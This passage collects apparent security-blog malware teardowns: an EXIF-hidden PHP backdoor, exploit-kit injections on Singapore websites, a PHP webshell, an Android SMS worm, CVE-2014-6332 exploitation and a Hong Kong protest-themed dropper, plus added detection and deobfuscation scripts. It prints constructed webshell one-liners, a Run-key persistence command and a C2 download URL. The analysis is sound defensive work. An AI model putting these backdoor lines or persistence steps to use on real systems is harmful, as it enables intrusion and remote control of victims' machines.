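        body = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and body.startswith(b"Exif\x00\x00"):
            return parse_ifd0_ascii(body[6:])
        pos += 2 + seglen
    return {}

PHP_CODE = re.compile(r"eval\s*\(|base64_decode|\$_(?:POST|GET|REQUEST)\b|preg_replace", re.I)
E_MODIFIER = re.compile(r"^/.*/[a-zA-Z]*e[a-zA-Z]*$")   # a regex literal with the e flag

def scan_jpeg(jpeg: bytes) -> List[str]:
    """Findings for the two-part EXIF backdoor: pattern-with-/e in Make, PHP in Model."""
    meta = exif_make_model(jpeg)
    findings = []
    if E_MODIFIER.match(meta.get("Make", "")):
        findings.append("Make holds a regex with the /e (eval) modifier")
    if PHP_CODE.search(meta.get("Model", "")):
        findings.append("Model holds PHP code")
    return findings

# Constructed sample: the inner PHP is an approximation of the zz1 backdoor described above
INNER = 'if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }'
SAMPLE_MODEL = "eval(base64_decode('%s'));" % base64.b64encode(INNER.encode()).decode()
SAMPLE_JPEG = build_exif_jpeg("/.*/e", SAMPLE_MODEL)

if __name__ == "__main__":
    print(exif_make_model(SAMPLE_JPEG))
    print(scan_jpeg(SAMPLE_JPEG) or ["clean"])
```

Point scan_jpeg() at every image under wp-content/uploads and the two-field signature is hard to miss; the Make check on its own also catches variants that move the payload into a different tag, because the /e pattern is the part the attacker cannot drop.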

As the website uses TimThumb, which has been known to have several security vulnerabilities for years, I would recommend that the site owner discontinue its use.

If anyone is interested in learning more about this, you can read about it here.
Related Links:
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
http://securelist.com/blog/research/58196/malware-in-metadata/

For the 2nd website,
Severity: Redirection to possibly ExploitKit
Confidence: Certain
Host: h–p://www[.]hinhuatdj[.]com
Path: /index[.]html

Issue Description:
If you take a look at the page source of index.html, you will find this malicious JavaScript at the bottom of the page.

Image 3 : Source of Index.html in www[.]hinhuatdj[.]com

Please don't run the script unless you know what you are doing. Once you have safely decoded it, you will see this.

Image 4 : Decoded Javascript pointing to Malicious website

A quick check against VirusTotal shows that it has previously been flagged as malicious by Kaspersky and Sucuri.

This is the Virustotal report on the website.
https://www.virustotal.com/en/url/57186289dcea318fc52dbfe1ccd850cb5c2e1ffdf3b6be136330cfad1a169f40/analysis/1417239062/

For the 3rd website,
Severity: Compromised website
Confidence: Certain
Host: h–p://www[.]mdas[.]org[.]sg
Path: /

Issue Description:
If you view the page source of the website in a safe manner,
you will see that the page has been injected with malicious HTML code, as shown below.
The links appear to be porn URLs.

Image 5 : Injected html codes

Visitors to this website might accidentally click on the porn URLs and potentially be exposed to other malicious content.
The IP address of this website is currently 111.235.138.70,
which belongs to Vodien Internet Solutions Pte Ltd, a local web hosting company.

For the 4th website,
Severity: ExploitKit
Confidence: Certain
Host: h–p://333bakkutteh[.]com
Path: /index[.]html

Issue Description:
If you view the page source of the website in a safe manner, you may find that this website is currently “parked” or not in use.

However, at the bottom of the page source of index.html, you will find this malicious JavaScript.

Image 6 : Injected html codes

Based on personal experience, I can straight away recognise this as an exploit kit landing page.
Visitors to this website are exposed to the exploits served by this exploit kit immediately.
The IP address of this website is currently 112.140.185.140,
which belongs to sparkstation.net, a .SG web hosting company.

For the 5th website,
Severity: Serving ExploitKit
Confidence: Certain
Host: h–p://fonghsiang[.]com[.]sg/
Path: /

Issue Description:
If you view the page source of the website in a safe manner,
you will see that the page has been injected with malicious HTML code, as shown below.

Image 7 : Injected html codes

For the 6th website,
Severity: ExploitKit
Confidence: Certain
Host: h–p://hychem-ap[.]com[.]sg
Path: /

Issue Description:
If you view the page source of the website in a safe manner,
you will see that the page has been injected with malicious HTML code, as shown below. It is the same code as on the 5th website.

Image 8 : Injected html codes

For the 7th website,
Severity: ExploitKit
Confidence: Certain
Host: h–p://actinium[.]sg/
Path: /

Issue Description:
If you view the page source of the website in a safe manner,
you will see that the page has been injected with malicious HTML code, as shown below. It is the same code as on the 5th website.

Image 9 : Injected html codes

Based on personal experience, I can straight away recognise that all of these are exploit kit injections.
Visitors to these websites are exposed to the exploits served by this exploit kit immediately.
The IP address of both h–p://fonghsiang[.]com[.]sg/ and h–p://hychem-ap[.]com[.]sg is currently 203.142.25.182, and h–p://actinium[.]sg/ is currently at 202.157.153.5.

Both 203.142.25.182 and 202.157.153.5 currently belong to Webvisions Pte Ltd, a .SG web hosting company.
The impact of these domains is that unprotected visitors could become the next victims for as long as both the injected scripts and the C2 are still working.
This is a “REMINDER” to everyone not to trust a site by its cover and to always exercise caution. Attackers are always thinking of new ways to trojanise victims.
The attackers here were clever to hide the malicious code the way they did, because they can easily trick victims into thinking the site has “already expired” or been “suspended” by the hosting provider.
But in reality, that is not the case.

Happy Reversing
Jacob Soo

[ Technical Teardown: PHP WebShell ]

[ How it starts ]
Today, my personal scanner found yet another PHP WebShell.
Since we at VXSecurity.sg haven't written anything on PHP WebShells yet, I will be writing one today.
So what is a “PHP WebShell”?
A PHP WebShell gives a malicious hacker access to perform the following actions:

  • Archive or extract files
  • Brute-force logins for FTP, MySQL, pgsql
  • Create or delete folders
  • Download files
  • Encode or decode files
  • Open a shell, which allows the remote attacker to execute arbitrary commands
  • Open files
  • Rename files
  • Run SQL commands
  • Search folders
  • Show active connections
  • Show other computers the infected server has access to
  • Show running services
  • Show user accounts
  • Show IP configuration
  • Connect to other servers

A PHP WebShell also lets the attacker connect back to the server to collect arbitrary information about your PC and/or server.
Today, I found this PHP WebShell at http://www[.]motorossarkany[.]hu/images/hir_41_1[.]jpg

[ Sample used in the analysis ]
MD5: 379f63c3df8570a479017757c0826d2e
SHA1: 3f86bd230c01c54d356d910c5ba161b2857ee5fb
PHP WebShell Sample
The password to the zip is “infected29A”

[ Tool Used ]
Notepad++

[ Analysis of the .JPG file ]
If we open this .jpg file in any hex editor or Notepad++, the following image is what we see.

php.webshell.01 Image 1 : hir_41_1.jpg

We can see right here that it is basically a .php file rather than a .jpg file.
In this case, the server's .htaccess is most likely configured to run .jpg files through the PHP handler (or the file is included from another PHP script); otherwise the code would never execute. This is why the PHP code runs even though the file extension is GIF or JPG.

Let's try decoding the top portion of the script; we should get back this:

Hmmm… it seems that $_F and $_X are not used. Or are they?
Reaching the bottom of the file, we see another interesting part of the script, as shown in the image below.

php.webshell.02 Image 2 : Decoding 2nd part of the PHP WebShell

As we can see here, we already have the value of “$OOO0000O0”: it is “base64_decode”.
So basically, it is just a base64 decoding of

Image 3 : String to be base64 decoded

After base64-decoding it, we get back the following piece of code.

To avoid anyone accidentally running the script, just replace the above code snippet with the following one.

Now if you run the script again, you should get back two .txt files (“file_x.txt” & “file_R.txt”).
I did this just to show the difference between the two for those who are not familiar with PHP.

Now we should be able to see the actual PHP WebShell, as shown below.
php.webshell.03
Image 3 : Final Deobfuscated PHP WebShell
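As an added example that is not part of the post, here is the manual peeling above turned into a loop: it resolves $var = 'base64_decode'-style aliases like the $OOO0000O0 seen here, finds the eval(...('literal')) call and applies the Python equivalents of base64_decode, gzinflate, str_rot13 and strrev, never executing any PHP. It stops on any function it cannot emulate rather than guessing. The three-layer sample it unwraps is constructed, not the shell from this post.

```python
"""Peel the eval(...) layers of an obfuscated PHP shell without executing any PHP.

Added example, not the post's decoder. The sample shell below is constructed: a
one-line fake shell wrapped in three layers (base64; gzinflate+base64; base64 called
through a $OOO0000O0-style alias) built with the same primitives the decoder undoes.
The decoder knows base64_decode, gzinflate, str_rot13 and strrev; anything else stops it.
"""
import base64
import codecs
import re
import zlib
from typing import Callable, Dict, List

def _b64(s: str) -> str:
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")

PRIMS: Dict[str, Callable[[str], str]] = {   # PHP function -> Python equivalent (text in, text out)
    "base64_decode": _b64,
    "gzinflate": lambda s: zlib.decompress(s.encode("latin-1"), -15).decode("latin-1"),
    "str_rot13": lambda s: codecs.encode(s, "rot13"),
    "strrev": lambda s: s[::-1],
}
ALIAS = re.compile(r"\$(\w+)\s*=\s*'([a-z0-9_]+)'\s*;", re.I)
EVAL = re.compile(r"eval\s*\(\s*((?:[a-z0-9_]+\s*\(\s*)+)'([^']*)'\s*\)+\s*;?", re.I)

def resolve_aliases(code: str) -> str:
    """Turn $var('...') calls into direct calls when $var was assigned a function name."""
    for var, fn in ALIAS.findall(code):
        code = re.sub(r"\$" + re.escape(var) + r"\s*\(", fn + "(", code)
    return code

def peel(code: str, max_layers: int = 20) -> List[str]:
    """Return every layer, outermost first; the last element has no eval() left
    (or max_layers was hit). Raises ValueError on a function we cannot emulate."""
    layers = [code]
    for _ in range(max_layers):
        code = resolve_aliases(code)
        m = EVAL.search(code)
        if not m:
            break
        chain = re.findall(r"[a-z0-9_]+", m.group(1).lower())   # outer ... inner
        unknown = [fn for fn in chain if fn not in PRIMS]
        if unknown:
            raise ValueError(f"cannot emulate {unknown}; decode this layer by hand")
        data = m.group(2)
        for fn in reversed(chain):                   # apply innermost first
            data = PRIMS[fn](data)
        code = code[:m.start()] + data + code[m.end():]
        layers.append(code)
    return layers

# --- constructed sample --------------------------------------------------------------
FINAL_SHELL = "if(isset($_POST['cmd'])){system($_POST['cmd']);}"   # fake; never run it

def build_sample() -> str:
    enc = lambda b: base64.b64encode(b).decode()
    layer1 = "eval(base64_decode('%s'));" % enc(FINAL_SHELL.encode())
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)          # raw DEFLATE = gzinflate input
    deflated = deflater.compress(layer1.encode("latin-1")) + deflater.flush()
    layer2 = "eval(gzinflate(base64_decode('%s')));" % enc(deflated)
    return "<?php $OOO0000O0 = 'base64_decode'; eval($OOO0000O0('%s')); ?>" % enc(layer2.encode("latin-1"))

if __name__ == "__main__":
    for depth, layer in enumerate(peel(build_sample())):
        print(f"--- layer {depth} ---\n{layer[:120]}{'...' if len(layer) > 120 else ''}")
```

Everything is kept as latin-1 text so the deflated bytes survive the round trip between layers. When peel() raises on an unknown function, that is the layer to hand-decode in the way the post does above, with the eval replaced by a write to a file.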

So the thing I hope sysadmins learn here is to always do due diligence checks on your web server and review your .htaccess files if there are any.
If you see new image files and lots of entries for them in the access logs, do check those files.

I hope this is useful to someone out there.

Happy Reversing
Jacob Soo

[ Technical Analysis: Scoop.apk ]

[ How it starts ]
I started writing about this particular malware before Christmas 2014, but it was left sitting in drafts for a long time until I decided to take a break from #EquationAPT today. It all started when I got the SMS shown below.

IMG-20141220-WA0002
Figure 1 – Initial SMS

I hardly take any photos, and the Sarah I know doesn't even SMS me, so I found it a bit weird. What is special about this sample is that it uses a technique typical of computer worms to spread itself.

This piece of malware relies on social engineering to convince the user to click on the shortened link in the SMS and install/run the malicious APK package.

[ Sample used in the analysis ]
MD5: 9187B180E741312AA0FF36EF6FE7DC51
SHA1: 322ABA633607F635F5581E8D7F53794566BCB80B
Malware Sample: Scoop
Password is “infected29A

[ Initial Analysis ]
Since it's an Android malware, let's check the permissions it requests and further dissect it. Use apktool to decode the APK by running the following command:

Now let's take a look at the AndroidManifest.xml file; you should see the following, including the permissions requested by the APK.

As you can see from AndroidManifest.xml, it asks for quite a lot of permissions.

[ SMS Propagation ]
One of the more interesting functions I found is how it tries to spread itself,
as you can see from the image below.
sms.sending.code
Figure 2 – The worm’s SMS sending code

What is rather typical of this kind of malware is that it leaks the victim's SMS messages, call history and contact list.
Another characteristic of this malware is that it fetches data from one of the hard-coded URLs in the APK with an HTTP POST.
The data it fetches typically looks like the snippet below.

Another interesting thing is that it goes to “http://topemarketing[.]com/app[.]html” to fetch a new copy of Scoop.apk.

The malicious URL in the SMS, https://bit[.]ly/s_-c, redirects you to http://secret-message[.]net/

This malicious page refreshes and directs the user to the malicious .APK file.

As I've already done quite a number of articles on reversing Android malware, today we will go through other things that might aid an investigation and show how this malware operates. The interesting thing here is that Bit.ly kindly provides statistics for every Bit.ly shortened URL: just append a “+” sign (without the double quotes), like this:
https://bitly[.]com/s_-c+

You will see the stats as of when I analysed this .apk. From the statistics given, we can see that most of the targets are from Singapore. 🙁

Figure 3 – Statistics of bit.ly url

What is even more interesting is that the same author of the malicious .APK file actually has several other domains spreading the same .APK file.
You can check out the other shortened bit.ly links by the same person here.
https://bitly.com/u/othv2

Interestingly, one of the links leads to an Android app in the Play Store.
https://play.google.com/store/apps/details?id=com.savemebeta

Figure 4 – Another app by Malware Author

Sadly, the app was removed before I could download it. The URL in the Play Store belongs to the same domain as the other malicious links.

Could it be the same guy? 😛

topemarketing[.]com points to 162.255.116.80
tombolaworld[.]com points to 192.64.112.120
secret-message[.]net points to 62.210.83.139

One other interesting thing is that 2 of the domains were bought around 2009 and 2010 and expired in 2011, according to who.is, as shown here: http://who.is/domain-history/topemarketing.com

But did this person buy them in 2014?
Or did he/she buy all those expired domains so that users might think they are still legit? Or has it been the malware author all along, who later decided to use WhoisGuard? We would probably need the whois records to verify this. 🙁

The worm is targeted mostly at Singaporean and French Android users, according to the statistics from Bit.ly. Not sure why the domains are still alive. Our advice to users on how they can protect themselves effectively:

  1. Restrict the installation of applications from unknown sources
  2. Don’t click on suspicious links, as malware authors might use them as part of their social engineering tricks
  3. Always use an updated anti-virus solution on your Android device if you don’t know how to analyse the application yourself

Happy Reversing,
Jacob Soo

[ Sharing ] More ITW Exploitation of Internet Explorer ‘Unicorn bug’ found

These few days I have seen friends asking me whether I have seen any sites during work using CVE-2014-6332.
Sad to say, I can’t talk about work. So today I will talk about what I’ve seen during my free personal time.

[ How it starts ]
So what is this vulnerability known as CVE-2014-6332?
This is an interesting bug, as it affects Internet Explorer versions 3 through 11. This means that most if not all Internet Explorer users are vulnerable unless they are on patched systems. It was first publicly disclosed by @yuange75 here on 1st August 2014: http://hi.baidu.com/yuange1975/item/c667f900cf0e2fc02e4c6bed
However, he found it long ago.

I guess it’s only a matter of time before “malware writers” start using this knowledge as part of their cybercrime. I’m not from any AV company nor a ThreatIntel team selling “APT” news, but I do want more people to know that there are now several compromised websites using the CVE-2014-6332 vulnerability to install malware on the computers of their unsuspecting visitors.

[ Compromised Website details ]
The very first one that I found is www[.]uyghurweb[.]net
The page source contains 2 interesting things that caught my “eyes”.

The 1st one is “http://122[.]10[.]91[.]20/2013/frame.js”, but it was down when I tried to grab it.
The other is the other JavaScript(s) in the page.

The more interesting one is “js/udg.js”, as it actually redirects visitors to another website serving “CVE-2014-6332”.

As you can see, the exploit is hosted on the domain “http://www[.]owner[.]com[.]tw”.
If you look at the source of “new.htm” as shown below, it looks almost identical to the one shared by @yuange75. I suppose this malware writer was too lazy to change anything in it.

I actually found a total of 7, but some are too sensitive to be shared. One of them was disclosed by ESET here:
http://www.welivesecurity.com/2014/11/20/first-exploitation-of-unicorn-bug/
The other 3 non-sensitive sites that I’ve found are:
http://finance[.]cedare[.]int/luz.htm
http://www[.]edicot[.]com/lulz.htm
http://www[.]e-ctasia[.]com/lulz.htm

Interestingly, for these 3, all are showing “Hacked by LulzSec” and the following is found in the page source.

My guess is that the first one is probably not related to the other 3. But one thing is for sure: there are more of these websites serving “CVE-2014-6332” as we speak.
I’ll probably blog about the payload later.

[ Conclusion ]
Although I do not have the mass amount of data that AV companies or ThreatIntel companies have to offer IOCs (Indicators of Compromise), if I can find a few websites within a week, I suppose it’s just a matter of time before exploit kits integrate this vulnerability into their existing toolkits. Since most Internet Explorer versions are affected, I guess users of Internet Explorer should just update IE NOW!!!!!

Happy Reversing
Jacob Soo

[ Technical Teardown: HongKong Protest Malware ]

[ How it starts ]
It all started when we saw Tsui Lokman mention an executable that they had received which could be malware.
This particular piece of malware could potentially be used to target Hongkongers participating in #OccupyCentral & #UmbrellaMovement.
Being the curious cat(s) that we are, we started asking for a copy of it to analyse.

[ Sample used in the analysis ]

[ Updates ] Since @vietwow requested a copy of the sample, we have attached it here as always.
Letter To Hong Kong 20141011_pdf_viewer. The password to the zip is “infected29A”
[ Tool Used ]


[ Analysis of Dropper ]
1) The executable is camouflaged as an Adobe executable (PDF viewer) by using an Adobe icon, as shown here.
Image 1 : Screenshot of Dropper

A Microsoft Excel icon is also found in the executable (using the Resource Hacker tool). However, the icon is not used at all. Probably there is another version of the dropper that disguises itself as an Excel document.

Image 2 : Extra icon using ResHacker

2) Upon execution of the dropper, the malware copies itself to C:\Documents and Settings\Administrator\Application Data\WMService.exe. The path the malware copies itself to varies with the operating system version. For Windows XP, the path is [drive]:\Documents and Settings\[User Name]\Application Data\WMService.exe, while for Vista and above the path is [drive]:\Users\[User Name]\AppData\Roaming\WMService.exe.

Image 3 : Screenshot of Dropped location

The first function of interest when running the malware is the decryption of the encrypted strings in the program. At address 00403E9A we can see a function call to address 00401F70.

Image 4 : List of Encoded Strings

From the above assembly code, we can see several encrypted strings. Note that there are several calls to function 00401AAE; this function is called to decrypt the encrypted strings. Instead of going through the decryption routine, my approach is to use OllyDbg to decrypt the strings at runtime, as shown below.

Image 5 : List of Decoded Strings

Now we can make a better educated guess about what the malware is doing with the decrypted strings. Previously, the IDA Pro strings did not really churn out anything useful for us, but with the decrypted strings we can see the malicious server’s domain name.

Moving on, we can see that after the decryption routine, the executable checks whether an -st argument was supplied to it.
On analysing the dropper in IDA Pro, the dropper has 2 distinct paths.
One path (Path A) is taken when no -st argument is supplied when executing the dropper, while the other path (Path B) is taken when the -st argument is supplied to the binary.
Path A is taken when the dropper is first executed by the user, with no arguments passed to the process. Path B is taken when the system boots up and executes the dropper via the registry’s Run key, which supplies the argument to the process.

Image 6 : 2 Paths of Malware

[ Analysis of Path A ]

At address 00403FAF we can see that a function at 00403B55 is called. This function forms the cmd.exe command line and executes it, as shown below.

Image 7 : Command Line to add Registry Entry

A registry entry is added via: reg add hkcu\software\microsoft\windows\currentversion\run /v hotkey /t reg_sz /d "C:\Documents and Settings\Administrator\Application Data\WMService.exe -st"

After execution, the dropper “deletes” itself by moving itself to C:\Documents and Settings\Administrator\Application Data\WMService.exe via c:\windows\system32\cmd.exe.

Image 8 : Command Line to “Move” Malware to another location

[ Analysis of Path B ]

The first thing Path B does is create a mutex object named “c8aabdc4” using the CreateMutex function. If the mutex already exists, the program terminates.

Image 9 : Creation of MutexName

The mutex prevents 2 such processes from running at the same time. The malware then calls the function at address 0040264A, which gets the computer name and internal IP address of the computer.

Next, GetTempPathA is called to form the path C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\s.bin, which is used as the destination file path of the actual payload.

The function at address 00403D60 takes the domain name www.sslquery.myz.info:443 and resolves it to an IP address: 113.10.245.133.

Image 10 : Possibly C&C of Malware

Function 00402350 is called to form the GET request to the C&C server. In the function we can see the computer name and internal IP address, as shown below.

Image 11 : Data that are sent back to C&C

The information gathered from the victim is encoded and appended to the URL.

URLDownloadToFileA is then called to upload the user info and download the payload from the URL below:

http://113.10.245.133:443/23qRBtcuhhT6RQlyu1UCPE7/Xr3zuUKejqj7jvbDS1lOxlTzc4W/3LaRfo+f6HiSg+RE1LQHP0Dd0tSVMT9KXTMmKh71dOj9vKvFS6Rn6+6Qf2jVjmNyHWn5BUV0QP+zEm9/XEXDd9RR0Tvnq2BpE66tKoZkUtDLuVT8X7BGjOa2Ct/VHNHXdTdWvYRYfnoXU0fCXtr7927GHEHho5uvxXgW149eEuExWXjslwtvniW0lF6maDcOmWbAcohjm/jLbHIa1RWR3hMY8y/+nmJXSrQ6D3wah9JHwORUvCUKK1X3Kt4w3AJBXJzC9qtD131K4P3R++cZdtdAewC+66LHA+3oBk9nIbTaGsD6prIZS1LrhRh3xB0ZJuds/bsxqJodiATKSWnASEvbMU2ZCs605p/3KorQsDgkdXEZOUzv8NEPyN/vLTTN3opci7d7N+sBtZXA3OqG+1tn+pBLIfggVDSZP/LJcOEYHfo+eLLweqc=.bin

to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\s.bin

However, at the time of analysing the sample, the server was already down.

Image 12 : Download URL of another payload
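As an added detection example (not from the original post), here is a small Python scanner over constructed proxy log lines that flags the beacon pattern described above: cleartext HTTP to port 443 with a long base64-looking path ending in .bin. The log layout (client, method, URL, status) is an assumption; the second sample line reuses the download URL recovered from the dropper, the rest are benign filler.

```python
import math
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Constructed proxy log in a "client method url status" layout (assumed, not a real product's format).
# The second line is the dropper's download URL from the analysis above; the others are benign filler.
SAMPLE_LOG = """\
10.0.0.5 GET http://www.example.com/index.html 200
10.0.0.5 GET http://113.10.245.133:443/23qRBtcuhhT6RQlyu1UCPE7/Xr3zuUKejqj7jvbDS1lOxlTzc4W/3LaRfo+f6HiSg+RE1LQHP0Dd0tSVMT9KXTMmKh71dOj9vKvFS6Rn6+6Qf2jVjmNyHWn5BUV0QP+zEm9/XEXDd9RR0Tvnq2BpE66tKoZkUtDLuVT8X7BGjOa2Ct/VHNHXdTdWvYRYfnoXU0fCXtr7927GHEHho5uvxXgW149eEuExWXjslwtvniW0lF6maDcOmWbAcohjm/jLbHIa1RWR3hMY8y/+nmJXSrQ6D3wah9JHwORUvCUKK1X3Kt4w3AJBXJzC9qtD131K4P3R++cZdtdAewC+66LHA+3oBk9nIbTaGsD6prIZS1LrhRh3xB0ZJuds/bsxqJodiATKSWnASEvbMU2ZCs605p/3KorQsDgkdXEZOUzv8NEPyN/vLTTN3opci7d7N+sBtZXA3OqG+1tn+pBLIfggVDSZP/LJcOEYHfo+eLLweqc=.bin 404
10.0.0.7 GET http://cdn.example.net/static/app.min.js 200
10.0.0.9 GET https://login.example.org:443/auth 200
"""

# A path made only of the base64 alphabet, at least 64 characters long, ending in .bin
BLOB_PATH = re.compile(r"^/[A-Za-z0-9+/=]{64,}\.bin$")


@dataclass
class Alert:
    client: str
    url: str
    reasons: list = field(default_factory=list)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded or encrypted blobs sit far above ordinary URL paths."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def inspect_request(client: str, url: str) -> Optional[Alert]:
    """Return an Alert listing every heuristic the request trips, or None if it trips none."""
    u = urlsplit(url)
    reasons = []
    if u.scheme == "http" and u.port == 443:
        reasons.append("cleartext-http-on-443")  # TLS port, but no TLS
    if BLOB_PATH.match(u.path):
        reasons.append("base64-blob-path")  # victim data encoded into the path
    if len(u.path) >= 64 and shannon_entropy(u.path) > 4.5:
        reasons.append("high-entropy-path")
    return Alert(client, url, reasons) if reasons else None


def scan_log(text: str) -> list:
    alerts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, _method, url, _status = parts[:4]
        alert = inspect_request(client, url)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"[!] {a.client} -> {a.url[:60]}... reasons={a.reasons}")
```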

Should the actual payload (s.bin) exist, we would expect the first byte of the downloaded payload to be the type of command to execute, as shown in the switch statement below. The function responsible for reading the commands from the downloaded payload is at address 00402553.

Image 13 : List of Commands for Malware

Based on the above switch statement, we can observe that the downloaded payload is in fact a set of commands to be executed on the machine. We do not really need to download and analyse the payload to know what it is doing. The functions the malware can perform are reading files, uploading files to the server, executing commands, deleting files, finding files and retrieving logical drive info.

Once the command is executed, the instruction file, s.bin, is deleted.

As we can see in the image below, the malware calls back to its server every hour to retrieve new commands to execute.

Image 14 : Hourly Sleep

[ Dropping of Persistent Backdoor ]
Earlier on, we mentioned that the malware added an entry to the registry. This registry key is added for persistence.
Location: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Name: Hotkey
Value: C:\Documents and Settings\Administrator\Application Data\WMService.exe -st
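As an added triage example (not from the original post), the Python below parses the textual output of a Run-key query and flags auto-start entries whose executable lives in a user-writable profile location, which is exactly where this dropper parks WMService.exe on both XP and Vista+. The sample output is constructed in the layout of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the "hotkey" line mirrors the entry described above and the other entries are filler for contrast.

```python
import re
from dataclasses import dataclass

# Constructed output in the layout of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
# The "hotkey" line mirrors the entry the dropper writes; the others are filler for contrast.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    hotkey    REG_SZ    C:\Documents and Settings\Administrator\Application Data\WMService.exe -st
    Updater    REG_SZ    "C:\Users\alice\AppData\Roaming\WMService.exe" -st
"""

# Per-user profile locations a normal account can write to without admin rights, in both the
# XP and the Vista+ spelling. An auto-start entry pointing there is a triage signal, not proof.
USER_WRITABLE = re.compile(
    r"\\(Application Data|AppData\\(Roaming|Local)|Local Settings\\Temp|Temp)\\", re.IGNORECASE
)


@dataclass
class RunEntry:
    name: str
    exe: str
    args: str
    suspicious: bool


def split_command(data: str) -> tuple:
    """Separate the executable path from its arguments. Handles quoted paths and, as in
    the dropper's entry, unquoted paths that contain spaces."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        if end == -1:
            return data.strip('"'), ""
        return data[1:end], data[end + 1:].strip()
    m = re.match(r"(.*?\.exe)(?:\s+(.*))?$", data, re.IGNORECASE)
    if not m:
        return data, ""
    return m.group(1), (m.group(2) or "").strip()


def parse_run_entries(text: str) -> list:
    """Parse value lines of the form: <name>  <REG_type>  <data> (columns separated by 2+ spaces)."""
    entries = []
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) != 3 or not parts[1].startswith("REG_"):
            continue  # key header, blank line, or something that is not a value
        name, _reg_type, data = parts
        exe, args = split_command(data)
        entries.append(RunEntry(name, exe, args, bool(USER_WRITABLE.search(exe))))
    return entries


def suspicious_run_entries(text: str) -> list:
    return [e for e in parse_run_entries(text) if e.suspicious]


if __name__ == "__main__":
    for e in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"[!] {e.name}: {e.exe} (args: {e.args or '-'})")
```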

You may find a screenshot of this in the [ Analysis of Path A ] section.

[ Anti Analysis Features ]
The author of this malware implemented a time delay in the program, possibly to evade anti-virus detection. Anti-virus engines execute a program to detect malicious code, but only for a short period of time. A time delay could potentially evade such scanning.

Using breakpoints in OllyDbg, we observed that IsDebuggerPresent is used to detect whether a debugger is attached to the dropper. However, there is no difference in the core operations even if the dropper detects that a debugger is present.

[ Whois Investigation ]
A quick Whois query using CentralOps revealed that the domain name (www.sslquery.myz.info) also points to the IP address (113.10.245.133) which we had found earlier in the binary. As myz.info is a “Free Dynamic DNS” service offered by ChangeIP.com, the infiltrator can change the IP address easily without affecting the callback.

However, the server is currently inactive. (Information correct as of 22/10/2014)

[ Domain Whois record ]

Queried whois.afilias.info with "myz.info"...

Domain Name:MYZ.INFO
Domain ID: D1182102-LRMS
Creation Date: 2001-10-26T05:20:59Z
Updated Date: 2012-07-12T14:25:25Z
Registry Expiry Date: 2017-10-26T05:20:59Z
Sponsoring Registrar:Network Solutions, LLC (R122-LRMS)
Sponsoring Registrar IANA ID: 2
Domain Status: clientTransferProhibited
Registrant ID:52605919-NSI
Registrant Name:ChangeIP Network OperationsZZZ
Registrant Street: 1200 Brickell Avenue
Registrant Street: Suite 1950
Registrant City:Miami
Registrant State/Province:FL
Registrant Postal Code:33131
Registrant Country:US
Registrant Phone:+1.8007913367
Registrant Fax: +1.7862246593
Registrant Email:noc@changeip.com
Admin ID:52605919-NSI
Admin Name:ChangeIP Network OperationsZZZ
Admin Street: 1200 Brickell Avenue
Admin Street: Suite 1950
Admin City:Miami
Admin State/Province:FL
Admin Postal Code:33131
Admin Country:US
Admin Phone:+1.8007913367
Admin Fax: +1.7862246593
Admin Email:noc@changeip.com
Billing ID:C1256251-LRMS
Billing Name:ChangeIP.com
Billing Organization:ChangeIP.com
Billing Street: 1200 Brickell Avenue
Billing Street: Suite 1950
Billing City:Miami
Billing State/Province:FL
Billing Postal Code:33131
Billing Country:US
Billing Phone:+1.8007913367
Billing Email:billing@changeip.com
Tech ID:52605919-NSI
Tech Name:ChangeIP Network OperationsZZZ
Tech Street: 1200 Brickell Avenue
Tech Street: Suite 1950
Tech City:Miami
Tech State/Province:FL
Tech Postal Code:33131
Tech Country:US
Tech Phone:+1.8007913367
Tech Fax: +1.7862246593
Tech Email:noc@changeip.com
Name Server:NS1.CHANGEIP.ORG
Name Server:NS2.CHANGEIP.ORG
Name Server:NS3.CHANGEIP.ORG
DNSSEC:Unsigned

inetnum: 113.10.245.0 - 113.10.245.255

netname: NWTBB-HK
descr: NWT Broadband Service
country: HK
admin-c: NC315-AP
tech-c: KW315-AP
status: ASSIGNED NON-PORTABLE
remarks: For network abuse email <abuse@newworldtel.com>
mnt-irt: IRT-NEWWORLDTEL-HK
changed: kmmwong@newworldtel.com 20101208
mnt-by: MAINT-HK-NEWWORLDTEL
source: APNIC

irt: IRT-NEWWORLDTEL-HK
address: 17/F Chevalier Commercial Centre,8 Wang Hoi Road, Kowloon Bay,Hong Kong.
e-mail: abuse@newworldtel.com
abuse-mailbox: abuse@newworldtel.com
admin-c: KW315-AP
tech-c: IDC1-AP
tech-c: NC315-AP
auth: # Filtered
mnt-by: MAINT-HK-NEWWORLDTEL
changed: abuse@newworldtel.com 20101207
source: APNIC

person: Kwong Ming Wong
nic-hdl: KW315-AP
e-mail: kmmwong@newworldtel.com
address: 17/F Chevalier Commercial Centre,8 Wang Hoi Road, Kowloon Bay,Hong Kong.
phone: +852-21300120
fax-no: + 852 – 2133 2175
country: HK
changed: kmmwong@newworldtel.com 20060814
mnt-by: MAINT-HK-NEWWORLDTEL
source: APNIC

person: Network Management Center
nic-hdl: NC315-AP
e-mail: nmc@newworldtel.com
address: 17/F Chevalier Commercial Centre,
address: 8 Wang Hoi Road, Kowloon Bay,
address: Hong Kong.
